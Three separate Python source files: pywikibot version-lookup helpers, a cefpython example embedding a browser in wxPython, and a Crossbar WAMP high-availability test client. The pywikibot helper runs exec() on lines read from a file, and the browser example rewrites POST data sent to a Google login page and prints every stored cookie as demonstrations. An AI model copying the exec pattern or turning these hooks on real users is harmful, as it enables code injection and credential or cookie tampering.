return (tag, rev, date, hsh)
def getversion_git(path=None):
"""Get version info for a Git clone.
@param path: directory of the Git checkout
@return:
- tag (name for the repository),
- rev (current revision identifier),
- date (date of current revision),
- hash (git hash for the current revision)
@rtype: C{tuple} of three C{str} and a C{time.struct_time}
"""
_program_dir = path or _get_program_dir()
cmd = 'git'
try:
subprocess.Popen([cmd], stdout=subprocess.PIPE).communicate()
except OSError:
# some windows git versions provide git.cmd instead of git.exe
cmd = 'git.cmd'
with open(os.path.join(_program_dir, '.git/config'), 'r') as f:
tag = f.read()
# Try 'origin' and then 'gerrit' as remote name; bail if can't find either.
remote_pos = tag.find('[remote "origin"]')
if remote_pos == -1:
remote_pos = tag.find('[remote "gerrit"]')
if remote_pos == -1:
tag = '?'
else:
s = tag.find('url = ', remote_pos)
e = tag.find('\n', s)
tag = tag[(s + 6):e]
t = tag.strip().split('/')
tag = '[%s] %s' % (t[0][:-1], '-'.join(t[3:]))
with subprocess.Popen([cmd, '--no-pager',
'log', '-1',
'--pretty=format:"%ad|%an|%h|%H|%d"'
'--abbrev-commit',
'--date=iso'],
cwd=_program_dir,
stdout=subprocess.PIPE).stdout as stdout:
info = stdout.read()
info = info.decode(config.console_encoding).split('|')
date = info[0][:-6]
date = time.strptime(date.strip('"'), '%Y-%m-%d %H:%M:%S')
with subprocess.Popen([cmd, 'rev-list', 'HEAD'],
cwd=_program_dir,
stdout=subprocess.PIPE).stdout as stdout:
rev = stdout.read()
rev = 'g%s' % len(rev.splitlines())
hsh = info[3] # also stored in '.git/refs/heads/master'
if (not date or not tag or not rev) and not path:
raise ParseError
return (tag, rev, date, hsh)
def getversion_nightly(path=None):
"""Get version info for a nightly release.
@param path: directory of the uncompressed nightly.
@return:
- tag (name for the repository),
- rev (current revision identifier),
- date (date of current revision),
- hash (git hash for the current revision)
@rtype: C{tuple} of three C{str} and a C{time.struct_time}
"""
if not path:
path = _get_program_dir()
with open(os.path.join(path, 'version')) as data:
(tag, rev, date, hsh) = data.readlines()
date = time.strptime(date[:19], '%Y-%m-%dT%H:%M:%S')
if not date or not tag or not rev:
raise ParseError
return (tag, rev, date, hsh)
def getversion_package(path=None): # pylint: disable=unused-argument
"""Get version info for an installed package.
@param path: Unused argument
@return:
- tag: 'pywikibot/__init__.py'
- rev: '-1 (unknown)'
- date (date the package was installed locally),
- hash (git hash for the current revision of 'pywikibot/__init__.py')
@rtype: C{tuple} of four C{str}
"""
hsh = get_module_version(pywikibot)
date = get_module_mtime(pywikibot).timetuple()
tag = 'pywikibot/__init__.py'
rev = '-1 (unknown)'
return (tag, rev, date, hsh)
def getversion_onlinerepo(repo=None):
"""Retrieve current framework revision number from online repository.
@param repo: (optional) Online repository location
@type repo: URL or string
"""
from pywikibot.comms import http
url = repo or 'https://git.wikimedia.org/feed/pywikibot/core'
buf = http.fetch(uri=url,
headers={'user-agent': '{pwb}'}).content.splitlines()
try:
hsh = buf[13].split('/')[5][:-1]
return hsh
except Exception as e:
raise ParseError(repr(e) + ' while parsing ' + repr(buf))
@deprecated('get_module_version, get_module_filename and get_module_mtime')
def getfileversion(filename):
"""Retrieve revision number of file.
Extracts __version__ variable containing Id tag, without importing it.
(thus can be done for any file)
The version variable containing the Id tag is read and
returned. Because it doesn't import it, the version can
be retrieved from any file.
@param filename: Name of the file to get version
@type filename: string
"""
_program_dir = _get_program_dir()
__version__ = None
mtime = None
fn = os.path.join(_program_dir, filename)
if os.path.exists(fn):
with codecs.open(fn, 'r', "utf-8") as f:
for line in f.readlines():
if line.find('__version__') == 0:
try:
exec(line)
except:
pass
break
stat = os.stat(fn)
mtime = datetime.datetime.fromtimestamp(stat.st_mtime).isoformat(' ')
if mtime and __version__:
return u'%s %s %s' % (filename, __version__[5:-1][:7], mtime)
else:
return None
def get_module_version(module):
"""
Retrieve __version__ variable from an imported module.
@param module: The module instance.
@type module: module
@return: The version hash without the surrounding text. If not present None.
@rtype: str or None
"""
if hasattr(module, '__version__'):
return module.__version__[5:-1]
def get_module_filename(module):
"""
Retrieve filename from an imported pywikibot module.
It uses the __file__ attribute of the module. If it's file extension ends
with py and another character the last character is discarded when the py
file exist.
@param module: The module instance.
@type module: module
@return: The filename if it's a pywikibot module otherwise None.
@rtype: str or None
"""
if hasattr(module, '__file__') and os.path.exists(module.__file__):
filename = module.__file__
if filename[-4:-1] == '.py' and os.path.exists(filename[:-1]):
filename = filename[:-1]
program_dir = _get_program_dir()
if filename[:len(program_dir)] == program_dir:
return filename
def get_module_mtime(module):
"""
Retrieve the modification time from an imported module.
@param module: The module instance.
@type module: module
@return: The modification time if it's a pywikibot module otherwise None.
@rtype: datetime or None
"""
filename = get_module_filename(module)
if filename:
return datetime.datetime.fromtimestamp(os.stat(filename).st_mtime)
def package_versions(modules=None, builtins=False, standard_lib=None):
"""Retrieve package version information.
When builtins or standard_lib are None, they will be included only
if a version was found in the package.
@param modules: Modules to inspect
@type modules: list of strings
@param builtins: Include builtins
@type builtins: Boolean, or None for automatic selection
@param standard_lib: Include standard library packages
@type standard_lib: Boolean, or None for automatic selection
"""
if not modules:
modules = sys.modules.keys()
import distutils.sysconfig
std_lib_dir = distutils.sysconfig.get_python_lib(standard_lib=True)
root_packages = set([key.split('.')[0]
for key in modules])
builtin_packages = set([name.split('.')[0] for name in root_packages
if name in sys.builtin_module_names or
'_' + name in sys.builtin_module_names])
# Improve performance by removing builtins from the list if possible.
if builtins is False:
root_packages = list(root_packages - builtin_packages)
std_lib_packages = []
paths = {}
data = {}
for name in root_packages:
try:
package = __import__(name, level=0)
except Exception as e:
data[name] = {'name': name, 'err': e}
continue
info = {'package': package, 'name': name}
if name in builtin_packages:
info['type'] = 'builtins'
if '__file__' in package.__dict__:
# Determine if this file part is of the standard library.
if os.path.normcase(package.__file__).startswith(
os.path.normcase(std_lib_dir)):
std_lib_packages.append(name)
if standard_lib is False:
continue
info['type'] = 'standard libary'
# Strip '__init__.py' from the filename.
path = package.__file__
if '__init__.py' in path:
path = path[0:path.index('__init__.py')]
if PY2:
path = path.decode(sys.getfilesystemencoding())
info['path'] = path
assert path not in paths, 'Path of the package is in defined paths'
paths[path] = name
if '__version__' in package.__dict__:
info['ver'] = package.__version__
elif name == 'mwlib': # mwlib 0.14.3 does not include a __init__.py
module = __import__(name + '._version',
fromlist=['_version'], level=0)
if '__version__' in module.__dict__:
info['ver'] = module.__version__
path = module.__file__
path = path[0:path.index('_version.')]
info['path'] = path
# If builtins or standard_lib is None,
# only include package if a version was found.
if (builtins is None and name in builtin_packages) or \
(standard_lib is None and name in std_lib_packages):
if 'ver' in info:
data[name] = info
else:
# Remove the entry from paths, so it isnt processed below
del paths[info['path']]
else:
data[name] = info
# Remove any pywikibot sub-modules which were loaded as a package.
# e.g. 'wikipedia_family.py' is loaded as 'wikipedia'
_program_dir = _get_program_dir()
for path, name in paths.items():
if _program_dir in path:
del data[name]
return data
|
|
# An example of embedding CEF browser in wxPython on Linux.
import ctypes, os, sys
libcef_so = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'libcef.so')
if os.path.exists(libcef_so):
# Import local module
ctypes.CDLL(libcef_so, ctypes.RTLD_GLOBAL)
if 0x02070000 <= sys.hexversion < 0x03000000:
import cefpython_py27 as cefpython
else:
raise Exception("Unsupported python version: %s" % sys.version)
else:
# Import from package
from cefpython1 import cefpython
import wx
import time
import re
import uuid
# Which method to use for message loop processing.
# EVT_IDLE - wx application has priority (default)
# EVT_TIMER - cef browser has priority
# It seems that Flash content behaves better when using a timer.
# IMPORTANT! On Linux EVT_IDLE does not work, the events seems to
# be propagated only when you move your mouse, which is not the
# expected behavior, it is recommended to use EVT_TIMER on Linux,
# so set this value to False.
USE_EVT_IDLE = False
def GetApplicationPath(file=None):
import re, os, platform
# If file is None return current directory without trailing slash.
if file is None:
file = ""
# Only when relative path.
if not file.startswith("/") and not file.startswith("\\") and (
not re.search(r"^[\w-]+:", file)):
if hasattr(sys, "frozen"):
path = os.path.dirname(sys.executable)
elif "__file__" in globals():
path = os.path.dirname(os.path.realpath(__file__))
else:
path = os.getcwd()
path = path + os.sep + file
if platform.system() == "Windows":
path = re.sub(r"[/\\]+", re.escape(os.sep), path)
path = re.sub(r"[/\\]+$", "", path)
return path
return str(file)
def ExceptHook(type, value, traceObject):
import traceback, os, time
# This hook does the following: in case of exception display it,
# write to error.log, shutdown CEF and exit application.
error = "\n".join(traceback.format_exception(type, value, traceObject))
error_file = GetApplicationPath("error.log")
try:
with open(error_file, "a") as file:
file.write("\n[%s] %s\n" % (time.strftime("%Y-%m-%d %H:%M:%S"), error))
except:
# If this is an example run from
# /usr/local/lib/python2.7/dist-packages/cefpython1/examples/
# then we might have not permission to write to that directory.
print("cefpython: WARNING: failed writing to error file: %s" % (
error_file))
print("\n"+error+"\n")
cefpython.QuitMessageLoop()
cefpython.Shutdown()
# So that "finally" does not execute.
os._exit(1)
class MainFrame(wx.Frame):
browser = None
initialized = False
idleCount = 0
box = None
def __init__(self):
wx.Frame.__init__(self, parent=None, id=wx.ID_ANY,
title='wxPython example', size=(800,600))
self.CreateMenu()
windowInfo = cefpython.WindowInfo()
windowInfo.SetAsChild(self.GetGtkWidget())
# Linux requires adding "file://" for local files,
# otherwise /home/some will be replaced as http://home/some
self.browser = cefpython.CreateBrowserSync(
windowInfo,
# Flash will crash app in CEF 1 on Linux, setting
# plugins_disabled to True.
browserSettings={"plugins_disabled": True},
navigateUrl="file://"+GetApplicationPath("wxpython.html"))
self.browser.SetClientHandler(ClientHandler())
jsBindings = cefpython.JavascriptBindings(
bindToFrames=False, bindToPopups=False)
jsBindings.SetObject("external", JavascriptBindings(self.browser))
self.browser.SetJavascriptBindings(jsBindings)
self.Bind(wx.EVT_CLOSE, self.OnClose)
if USE_EVT_IDLE:
# Bind EVT_IDLE only for the main application frame.
self.Bind(wx.EVT_IDLE, self.OnIdle)
def CreateMenu(self):
filemenu = wx.Menu()
filemenu.Append(1, "Open")
filemenu.Append(2, "Exit")
aboutmenu = wx.Menu()
aboutmenu.Append(1, "CEF Python")
menubar = wx.MenuBar()
menubar.Append(filemenu,"&File")
menubar.Append(aboutmenu, "&About")
self.SetMenuBar(menubar)
def OnClose(self, event):
self.browser.CloseBrowser()
self.Destroy()
def OnIdle(self, event):
# self.idleCount += 1
# print("wxpython.py: OnIdle() %d" % self.idleCount)
cefpython.MessageLoopWork()
class JavascriptBindings:
mainBrowser = None
webRequest = None
webRequestId = 0
cookieVisitor = None
def __init__(self, mainBrowser):
self.mainBrowser = mainBrowser
def WebRequest(self, url):
request = cefpython.Request.CreateRequest()
request.SetUrl(url)
webRequestClient = WebRequestClient()
# Must keep the reference otherwise WebRequestClient
# callbacks won't be called.
self.webRequest = cefpython.WebRequest.CreateWebRequest(request,
webRequestClient)
def DoCallFunction(self):
self.mainBrowser.GetMainFrame().CallFunction(
"MyFunction", "abc", 12, [1,2,3], {"qwe": 456, "rty": 789})
def VisitAllCookies(self):
# Need to keep the reference alive.
self.cookieVisitor = CookieVisitor()
cookieManager = self.mainBrowser.GetUserData("cookieManager")
if not cookieManager:
print("\nCookie manager not yet created! Visit http website first")
return
cookieManager.VisitAllCookies(self.cookieVisitor)
def VisitUrlCookies(self):
# Need to keep the reference alive.
self.cookieVisitor = CookieVisitor()
cookieManager = self.mainBrowser.GetUserData("cookieManager")
if not cookieManager:
print("\nCookie manager not yet created! Visit http website first")
return
cookieManager.VisitUrlCookies(
"http://www.html-kit.com/tools/cookietester/",
False, self.cookieVisitor)
# .www.html-kit.com
def SetCookie(self):
cookieManager = self.mainBrowser.GetUserData("cookieManager")
if not cookieManager:
print("\nCookie manager not yet created! Visit http website first")
return
cookie = cefpython.Cookie()
cookie.SetName("Created_Via_Python")
cookie.SetValue("yeah really")
cookieManager.SetCookie("http://www.html-kit.com/tools/cookietester/",
cookie)
print("\nCookie created! Visit html-kit cookietester to see it")
def DeleteCookies(self):
cookieManager = self.mainBrowser.GetUserData("cookieManager")
if not cookieManager:
print("\nCookie manager not yet created! Visit http website first")
return
cookieManager.DeleteCookies(
"http://www.html-kit.com/tools/cookietester/",
"Created_Via_Python")
print("\nCookie deleted! Visit html-kit cookietester to see the result")
class CookieVisitor:
def Visit(self, cookie, count, total, deleteCookie):
if count == 0:
print("\nCookieVisitor.Visit(): total cookies: %s" % total)
print("\nCookieVisitor.Visit(): cookie:")
print(cookie.Get())
# True to continue visiting cookies
return True
class WebRequestClient:
def OnStateChange(self, webRequest, state):
stateName = "unknown"
for key, value in cefpython.WebRequest.State.iteritems():
if value == state:
stateName = key
print("\nWebRequestClient::OnStateChange(): state = %s" % stateName)
def OnRedirect(self, webRequest, request, response):
print("\nWebRequestClient::OnRedirect(): url = %s" % (
request.GetUrl()[:80]))
def OnHeadersReceived(self, webRequest, response):
print("\nWebRequestClient::OnHeadersReceived(): headers = %s" % (
response.GetHeaderMap()))
def OnProgress(self, webRequest, bytesSent, totalBytesToBeSent):
print("\nWebRequestClient::OnProgress(): bytesSent = %s, "
"totalBytesToBeSent = %s" % (bytesSent, totalBytesToBeSent))
def OnData(self, webRequest, data):
print("\nWebRequestClient::OnData(): data:")
print("-" * 60)
print(data)
print("-" * 60)
def OnError(self, webRequest, errorCode):
print("\nWebRequestClient::OnError(): errorCode = %s" % errorCode)
class ContentFilterHandler:
def OnData(self, data, substitute_data):
if data == "body { color: red; }":
substitute_data.SetData("body { color: green; }")
def OnDrain(self, remainder):
remainder.SetData("body h3 { color: orange; }")
class ClientHandler:
# --------------------------------------------------------------------------
# RequestHandler
# --------------------------------------------------------------------------
contentFilter = None
def OnBeforeBrowse(self, browser, frame, request, navType, isRedirect):
# - frame.GetUrl() returns current url
# - request.GetUrl() returns new url
# - Return true to cancel the navigation or false to allow
# the navigation to proceed.
# - Modifying headers or post data can be done only in
# OnBeforeResourceLoad()
print("\nOnBeforeBrowse(): request.GetUrl() = %s, "
"request.GetHeaderMap(): %s" % (
request.GetUrl()[:80], request.GetHeaderMap()))
if request.GetMethod() == "POST":
print("\nOnBeforeBrowse(): POST data: %s" % (
request.GetPostData()))
def OnBeforeResourceLoad(self, browser, request, redirectUrl,
streamReader, response, loadFlags):
print("\nOnBeforeResourceLoad(): request.GetUrl() = %s" % (
request.GetUrl()[:80]))
if request.GetMethod() == "POST":
if request.GetUrl().startswith(
"https://accounts.google.com/ServiceLogin"):
postData = request.GetPostData()
postData["Email"] = "--changed via python"
request.SetPostData(postData)
print("\nOnBeforeResourceLoad(): modified POST data: %s" % (
request.GetPostData()))
if request.GetUrl().endswith("replace-on-the-fly.css"):
print("\nOnBeforeResourceLoad(): replacing css on the fly")
response.SetStatus(200)
response.SetStatusText("OK")
response.SetMimeType("text/css")
streamReader.SetData("body { color: red; }")
def OnResourceRedirect(self, browser, oldUrl, newUrl):
print("\nOnResourceRedirect(): oldUrl: %s, newUrl: %s" % (
oldUrl, newUrl[0]))
def OnResourceResponse(self, browser, url, response, contentFilter):
print("\nOnResourceResponse(): url = %s, headers = %s" % (
url[:80], response.GetHeaderMap()))
if url.endswith("content-filter/replace-on-the-fly.css"):
print("\nOnResourceResponse(): setting contentFilter handler")
contentFilter.SetHandler(ContentFilterHandler())
# Must keep the reference to contentFilter otherwise
# ContentFilterHandler callbacks won't be called.
self.contentFilter = contentFilter
def GetCookieManager(self, browser, mainUrl):
# Create unique cookie manager for each browser.
cookieManager = browser.GetUserData("cookieManager")
if cookieManager:
return cookieManager
else:
cookieManager = cefpython.CookieManager.CreateManager("")
browser.SetUserData("cookieManager", cookieManager)
return cookieManager
# --------------------------------------------------------------------------
# DragHandler
# --------------------------------------------------------------------------
def OnDragStart(self, browser, dragData, mask):
maskNames = ""
for key, value in cefpython.Drag.Operation.iteritems():
if value and (value & mask) == value:
maskNames += " "+key
print("\nOnDragStart(): mask=%s" % maskNames)
print(" IsLink(): %s" % dragData.IsLink())
print(" IsFragment(): %s" % dragData.IsFragment())
print(" IsFile(): %s" % dragData.IsFile())
print(" GetLinkUrl(): %s" % dragData.GetLinkUrl())
print(" GetLinkTitle(): %s" % dragData.GetLinkTitle())
print(" GetLinkMetadata(): %s" % dragData.GetLinkMetadata())
print(" GetFragmentText(): %s" % dragData.GetFragmentText())
print(" GetFragmentHtml(): %s" % dragData.GetFragmentHtml())
print(" GetFragmentBaseUrl(): %s" % dragData.GetFragmentBaseUrl())
print(" GetFile(): %s" % dragData.GetFile())
print(" GetFiles(): %s" % dragData.GetFiles())
# Returning True on Linux causes segmentation fault,
# reported the bug here:
# http://www.magpcss.org/ceforum/viewtopic.php?f=6&t=10693
# Not being able to cancel a drag event is a problem
# only when a link or a folder is dragged, as this will
# cause loading the link or the folder in the browser window.
# When dragging text/html or a file it is not a problem, as
# it does not lead to browser navigating.
return False
def OnDragEnter(self, browser, dragData, mask):
maskNames = ""
for key, value in cefpython.Drag.Operation.iteritems():
if value and (value & mask) == value:
maskNames += " "+key
print("\nOnDragEnter(): mask=%s" % maskNames)
print(" IsLink(): %s" % dragData.IsLink())
print(" IsFragment(): %s" % dragData.IsFragment())
print(" IsFile(): %s" % dragData.IsFile())
print(" GetLinkUrl(): %s" % dragData.GetLinkUrl())
print(" GetLinkTitle(): %s" % dragData.GetLinkTitle())
print(" GetLinkMetadata(): %s" % dragData.GetLinkMetadata())
print(" GetFragmentText(): %s" % dragData.GetFragmentText())
print(" GetFragmentHtml(): %s" % dragData.GetFragmentHtml())
print(" GetFragmentBaseUrl(): %s" % dragData.GetFragmentBaseUrl())
print(" GetFile(): %s" % dragData.GetFile())
print(" GetFiles(): %s" % dragData.GetFiles())
# Returning True on Linux causes segmentation fault,
# reported the bug here:
# http://www.magpcss.org/ceforum/viewtopic.php?f=6&t=10693
# Not being able to cancel a drag event is a problem
# only when a link or a folder is dragged, as this will
# cause loading the link or the folder in the browser window.
# When dragging text/html or a file it is not a problem, as
# it does not lead to browser navigating.
return False
# --------------------------------------------------------------------------
# DownloadHandler
# --------------------------------------------------------------------------
downloadHandler = None
def GetDownloadHandler(self, browser, mimeType, filename, contentLength):
# Close the browser window if it is a popup with
# no other document contents.
if browser.IsPopup() and not browser.HasDocument():
browser.CloseBrowser()
# The reference to DownloadHandler must be kept alive
# while download proceeds.
if self.downloadHandler and self.downloadHandler.downloading:
print("\nDownload is already in progress")
return False
self.downloadHandler = DownloadHandler(mimeType, filename,
contentLength)
return self.downloadHandler
class DownloadHandler:
mimeType = ""
filename = ""
contentLength = -1 # -1 means that file size was not provided.
fp = None
downloadsDir = "./downloads"
alreadyDownloaded = 0
downloading = False
def __init__(self, mimeType, filename, contentLength):
self.downloading = True
if not os.path.exists(self.downloadsDir):
os.mkdir(self.downloadsDir)
filename = filename.strip()
if not len(filename):
filename = self.GetUniqueFilename()
filename = self.GetSafeFilename(filename)
print("\nDownloadHandler() created")
print("mimeType: %s" % mimeType)
print("filename: %s" % filename)
print("contentLength: %s" % contentLength)
# Append ".downloading" to the filename, in OnComplete()
# when download finishes get rid of this extension.
filename += ".downloading"
if os.path.exists(self.downloadsDir+"/"+filename):
# If the last download did not succeed, the
# "xxx.downloading" might still be there.
os.remove(self.downloadsDir+"/"+filename)
self.mimeType = mimeType
self.filename = filename
self.contentLength = contentLength
self.fp = open(self.downloadsDir+"/"+filename, "wb")
def GetSafeFilename(self, filename):
if os.path.exists(self.downloadsDir+"/"+filename):
filename = self.GetUniqueFilename()[:4]+"_"+filename
assert not os.path.exists(self.downloadsDir+"/"+filename), (
"File aready exists")
return filename
def GetUniqueFilename(self):
# The filename may be empty, in that case generate
# an unique name.
return str(uuid.uuid4()).replace("-", "")[:16]
def OnData(self, data):
if self.alreadyDownloaded == 0:
sys.stdout.write("Download progress: ")
sys.stdout.write(".")
sys.stdout.flush()
self.alreadyDownloaded += len(data)
self.fp.write(data)
# time.sleep(1) # Let's make the progress a bit slower (if cached)
# Return True to continue receiving data, False to cancel.
return True
def OnComplete(self):
sys.stdout.write("\n")
sys.stdout.flush()
self.fp.close()
currentFile = self.downloadsDir+"/"+self.filename
newFilename = re.sub(".downloading$", "", self.filename)
os.rename(self.downloadsDir+"/"+self.filename,
self.downloadsDir+"/"+newFilename)
self.downloading = False
print("\nDownload complete!")
print("Total downloaded: %s" % self.PrettyBytes(
self.alreadyDownloaded))
print("See the 'downloads' directory.")
def PrettyBytes(self, bytes):
KiB = 1024
return "%.3g KiB" % (bytes / KiB)
class MyApp(wx.App):
timer = None
timerID = 1
timerCount = 0
def OnInit(self):
if not USE_EVT_IDLE:
self.CreateTimer()
frame = MainFrame()
self.SetTopWindow(frame)
frame.Show()
return True
def CreateTimer(self):
# See "Making a render loop":
# http://wiki.wxwidgets.org/Making_a_render_loop
# Another approach is to use EVT_IDLE in MainFrame,
# see which one fits you better.
self.timer = wx.Timer(self, self.timerID)
self.timer.Start(10) # 10ms
wx.EVT_TIMER(self, self.timerID, self.OnTimer)
def OnTimer(self, event):
self.timerCount += 1
# print("wxpython.py: OnTimer() %d" % self.timerCount)
cefpython.MessageLoopWork()
def OnExit(self):
# When app.MainLoop() returns, MessageLoopWork() should
# not be called anymore.
if not USE_EVT_IDLE:
self.timer.Stop()
if __name__ == '__main__':
sys.excepthook = ExceptHook
cefpython.g_debug = True
cefpython.g_debugFile = GetApplicationPath("debug.log")
settings = {
"log_severity": cefpython.LOGSEVERITY_INFO,
"log_file": GetApplicationPath("debug.log"),
"release_dcheck_enabled": True, # Enable only when debugging.
# This directories must be set on Linux
"locales_dir_path": cefpython.GetModuleDirectory()+"/locales",
"resources_dir_path": cefpython.GetModuleDirectory()
}
cefpython.Initialize(settings)
print('wx.version=%s' % wx.version())
app = MyApp(False)
app.MainLoop()
# Let wx.App destructor do the cleanup before calling cefpython.Shutdown().
del app
cefpython.Shutdown()
|
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Crossbar.io Technologies GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
import sys
import copy
import uuid
import os
import argparse
import hashlib
import binascii
import configparser
from pprint import pprint
import txaio
from zlmdb import time_ns
from twisted.internet.defer import inlineCallbacks, gatherResults
from twisted.internet.task import LoopingCall, react
from autobahn.wamp.exception import TransportLost
from autobahn.twisted.util import sleep
from autobahn.twisted.wamp import ApplicationSession, ApplicationRunner
from autobahn.wamp.types import SubscribeOptions, PublishOptions, RegisterOptions, CallOptions
from crossbar.common.processinfo import ProcessInfo
from crossbar._util import hl
class HATestClientSession(ApplicationSession):
TEST_TOPIC = 'com.example.test1.binary'
TEST_PROC = 'com.example.proc1.binary'
log = txaio.make_logger()
def proc1(self, logname, url, loop, counter, payload, details=None):
fingerprint = hashlib.sha256(payload).digest()[:6]
self.log.info(
'{logprefix}: INVOCATION received on pid={pid} from {sender} -> loop={loop}, counter={counter}, len={payload_len}, fp={fp}, caller={caller}, caller_authid={caller_authid}, caller_authrole={caller_authrole}, forward_for={forward_for}',
logprefix=hl('WAMP {}:{}'.format(self._url, self._logname), color='blue', bold=True),
pid=hl(self._pid, color='blue', bold=True),
sender=hl('{}:{}'.format(url, logname), color='blue', bold=True),
loop=loop,
counter=counter,
procedure=details.procedure,
payload_len=len(payload),
fp=hl(binascii.b2a_hex(fingerprint).decode(), color='blue', bold=True),
caller=hl(details.caller, color='blue', bold=True),
caller_authid=hl(details.caller_authid, color='blue', bold=True),
caller_authrole=hl(details.caller_authrole, color='blue', bold=True),
forward_for=details.forward_for)
fingerprint = hashlib.sha256(payload).digest()[:6]
self._received_calls_cnt += 1
self._received_calls_bytes += len(payload)
if details.forward_for:
self._received_calls_ff_cnt += 1
return fingerprint, self._pid, self._logname, self._url
def on_event1(self, logname, url, loop, counter, payload, details=None):
fingerprint = hashlib.sha256(payload).digest()[:6]
self.log.debug('{logprefix}: EVENT received from {sender} -> loop={loop}, counter={counter}, len={payload_len}, fp={fp}, publisher={publisher}, publisher_authid={publisher_authid}, publisher_authole={publisher_authrole}, forward_for={forward_for}',
logprefix=hl('WAMP {}:{}'.format(self._url, self._logname), color='blue', bold=True),
sender=hl('{}:{}'.format(url, logname), color='blue', bold=True),
loop=loop,
counter=counter,
topic=details.topic,
payload_len=len(payload),
fp=hl(binascii.b2a_hex(fingerprint).decode(), color='blue', bold=True),
publisher=hl(details.publisher, color='blue', bold=True),
publisher_authid=hl(details.publisher_authid, color='blue', bold=True),
publisher_authrole=hl(details.publisher_authrole, color='blue', bold=True),
forward_for=details.forward_for)
self._received_cnt += 1
self._received_bytes += len(payload)
if details.forward_for:
self._received_ff_cnt += 1
@inlineCallbacks
def onJoin(self, details):
self._pid = os.getpid()
# benchmark parametrization:
self._period = self.config.extra.get('period', 10)
self._loops = self.config.extra.get('loops', 1)
self._rate = self.config.extra.get('rate', 1)
self._stride = self.config.extra.get('stride', 1)
self._size = self.config.extra.get('size', 256)
self._logname = self.config.extra.get('logname', None)
self._url = self.config.extra.get('url', None)
self._silent = self.config.extra.get('silent', False)
self._batch_id = uuid.uuid4()
self._running = True
self._pinfo = ProcessInfo()
# run-time session statistics for EVENTs
self._received_cnt = 0
self._received_bytes = 0
self._received_ff_cnt = 0
self._published_cnt = 0
self._published_bytes = 0
# run-time session statistics for CALLs
self._received_calls_cnt = 0
self._received_calls_bytes = 0
self._received_calls_ff_cnt = 0
self._calls_cnt = 0
self._calls_bytes = 0
self.log.info('{logname} connected [batch="{batch_id}"]: {details}',
logname=self._logname, batch_id=hl(self._batch_id), details=details)
self._last_stats = None
self._stats_loop = None
if self._silent:
self._stats(self._batch_id, self.log.info)
stats_period = 10.
if stats_period:
self._stats_loop = LoopingCall(self._stats, self._batch_id, self.log.info)
self._stats_loop.start(stats_period)
yield self.subscribe(self.on_event1,
HATestClientSession.TEST_TOPIC,
options=SubscribeOptions(match='exact', details=True))
for i in range(self._loops):
self._sender_loop('{}.{}'.format(self._logname, i))
self.log.info('{logname} ready [period={period}, loops={loops}, rate={rate}, stride={stride}, size={size}]',
logname=self._logname, period=self._period, loops=self._loops, rate=self._rate,
stride=self._stride, size=self._size)
def onLeave(self, details):
self.log.info('{logname} leaving: reason="{reason}"', logname=self._logname, reason=details.reason)
self._running = False
if self._silent:
self._stats(self._batch_id, self.log.warn)
if self._stats_loop:
self._stats_loop.stop()
self._stats_loop = None
@inlineCallbacks
def _sender_loop(self, loopname, enable_publish=True, enable_call=True):
loop = 0
while self._running:
started = time_ns()
dl = []
for counter in range(self._stride):
payload = os.urandom(self._size)
fingerprint = hashlib.sha256(payload).digest()[:6]
if enable_publish:
d = self.publish(HATestClientSession.TEST_TOPIC,
self._logname,
self._url,
loop,
counter,
payload,
options=PublishOptions(acknowledge=True, exclude_me=False))
dl.append(d)
self._published_cnt += 1
self._published_bytes += len(payload)
self.log.debug(
'{logprefix}: EVENT sent from session={session}, authid={authid}, authrole={authrole} -> loop={loop}, counter={counter}, len={payload_len}, fp={fp}',
logprefix=hl('WAMP {}:{}'.format(self._url, self._logname), color='green', bold=True),
session=hl(self._session_id, color='green', bold=True),
authid=hl(self._authid, color='green', bold=True),
authrole=hl(self._authrole, color='green', bold=True),
loop=loop,
counter=counter,
topic=HATestClientSession.TEST_TOPIC,
payload_len=len(payload),
fp=hl(binascii.b2a_hex(fingerprint).decode(), color='green', bold=True))
if enable_call:
for uri in ['node{}.container1.proc1'.format(i + 1) for i in range(4)]:
d = self.call(uri,
self._logname,
self._url,
loop,
counter,
payload,
options=CallOptions(details=True))
def check_result(result, uri):
print('-' * 100, result)
_fingerprint, _pid, _logname, _url = result.results[0]
self.log.info('{logprefix}: CALL RESULT for {uri} received from pid={pid}, logname={logname}, url={url}, callee={callee}, callee_authid={callee_authid}, callee_authrole={callee_authrole}, forward_for={forward_for}, fp={fp} => fp_equal={fp_equal}',
logprefix=hl('WAMP {}:{}'.format(self._url, self._logname), color='green',
bold=True),
pid=hl(_pid, color='green', bold=True),
logname=_logname,
url=_url,
fp=hl(binascii.b2a_hex(fingerprint).decode(), color='green', bold=True),
fp_equal=(_fingerprint == fingerprint),
uri=hl(uri, color='yellow', bold=True),
callee=result.callee,
callee_authid=result.callee_authid,
callee_authrole=result.callee_authrole,
forward_for=result.forward_for)
assert _fingerprint == fingerprint
def error(err):
print(err)
d.addCallbacks(check_result, error, (uri,))
dl.append(d)
self._calls_cnt += 1
self._calls_bytes += len(payload)
self.log.info(
'{logprefix}: CALL issued to {uri} from pid={pid}, session={session}, authid={authid}, authrole={authrole} -> loop={loop}, counter={counter}, len={payload_len}, fp={fp}',
logprefix=hl('WAMP {}:{}'.format(self._url, self._logname), color='green', bold=True),
pid=hl(self._pid, color='green', bold=True),
session=hl(self._session_id, color='green', bold=True),
authid=hl(self._authid, color='green', bold=True),
authrole=hl(self._authrole, color='green', bold=True),
uri=hl(uri, color='yellow', bold=True),
loop=loop,
counter=counter,
procedure=HATestClientSession.TEST_PROC,
